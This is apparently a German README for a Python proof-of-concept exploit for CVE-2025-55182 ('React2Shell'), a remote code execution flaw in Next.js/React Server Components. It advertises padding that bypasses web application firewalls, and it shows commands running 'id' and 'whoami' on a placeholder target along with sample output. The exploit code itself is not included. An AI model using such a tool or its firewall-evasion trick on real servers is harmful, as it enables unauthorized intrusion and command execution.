
Python PoC für CVE-2025-55182 (React2Shell) RCE in Next.js/React Server Components mit dynamischem WAF-Bypass-Padding für autorisierte Sicherheitstests.
Ein sauberer, zuverlässiger Python Proof-of-Concept-Exploit für CVE-2025-55182 (auch bekannt als React2Shell), eine kritische Remote-Codeausführungsschwachstelle in React Server Components, die von Next.js (App Router) und ähnlichen Frameworks verwendet werden.
Dieser PoC enthält dynamisches WAF-Bypass-Padding, um gängige Web Application Firewalls (Cloudflare, AWS WAF, etc.) zu umgehen, die die tiefe Inspektion großer Multipart-Bodies einschränken.
requests-Bibliothekpip install requests
python poc.py https://vulnerable-target.com "id"
python poc.py https://vulnerable-target.com "whoami" 256
[*] Sending payload to https://vulnerable-target.com with 256KB padding...
[*] Command: id
[+] RCE Successful! Output:
uid=1000(node) gid=1000(node) groups=1000(node),4(adm),27(sudo)
Dieses Tool ist nur für autorisierte Sicherheitstests und Forschung bestimmt.